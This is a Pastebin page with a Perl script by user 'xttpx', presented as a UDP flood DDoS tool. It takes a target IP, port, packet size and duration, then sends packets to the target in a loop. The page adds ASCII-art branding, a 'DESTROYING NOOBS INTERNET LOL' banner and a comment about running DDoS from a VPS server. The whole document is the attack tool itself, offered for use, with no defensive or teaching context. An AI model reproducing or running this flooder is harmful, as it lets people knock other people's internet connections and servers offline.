Advertisement
xttpx

noob

Dec 7th, 2022
1,241
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.23 KB | None | 1 0
  1. #!/usr/bin/perl -w
  2. use Socket;
  3. use strict;
  4.  
  5. if ($#ARGV != 3) {
  6.   print "NOOB SCRIPT V2.00 <ip> <port> <size> <time>\n\n";
  7.   print " port=0: use random ports\n";
  8.   print " size=0: use random size between 64 and 65000\n";
  9.   print " time=0: continuous flood\n";
  10.   exit(1);
  11. }
  12. #if(EDITED_NOOB_SCRIPT_DDOS_RUNNING_VPS_SERVER \-f/END SCRIPT
  13. my ($ip,$port,$size,$time) = @ARGV;
  14.  
  15. my ($iaddr,$endtime,$psize,$pport);
  16.  
  17. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  18. $endtime = time() + ($time ? $time : 500000000);
  19.  
  20. socket(flood, PF_INET, SOCK_DGRAM, 17);
  21.  
  22. print <<EOTEXT;
  23.                       .
  24. NNNNN       NNNN   00000000000   00000000000   BBBBBBBBB
  25. NNNN N      NNNN   0000   0000   0000   0000    BB      B
  26. NNNN  N     NNNN   0000   0000   0000   0000    BB      B
  27. NNNN   N    NNNN   0000   0000   0000   0000    BBBBBBBB
  28. NNNN    N   NNNN   0000   0000   0000   0000    BBBBBBBB
  29. NNNN     N  NNNN   0000   0000   0000   0000    BB      B
  30. NNNN      N NNNN   0000   0000   0000   0000    BB      B
  31. NNNN       NNNNN   00000000000   00000000000   BBBBBBBBB
  32.  
  33.         CODED BY: || xttpx ||
  34.          
  35. EOTEXT
  36.  
  37. print "DESTROYING NOOBS INTERNET LOL....!
  38. $ip" . ($port ? $port : "random") . " port with " .
  39.   ($size ? "$size-byte" : "random size") . " packets" .
  40.   ($time ? " for $time seconds" : "") . "\n";
  41. print "Break with Ctrl-C\n" unless $time;
  42.  
  43. for (;time() <= $endtime;) {
  44.   $psize = $size ? $size : int(rand(1500000-64)+64) ;
  45.   $pport = $port ? $port : int(rand(1500000))+1;
  46.  
  47.  send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepPTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afauhgjhgjhgjhgjhgjgubihjbghfhgbjnkncvguihjihijguyyihhfduyhjkjhdcfghnjkjhucdrxcftgfvbhnjiknhcrdcfvghunmjikngdcrftgyvbnjikm","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement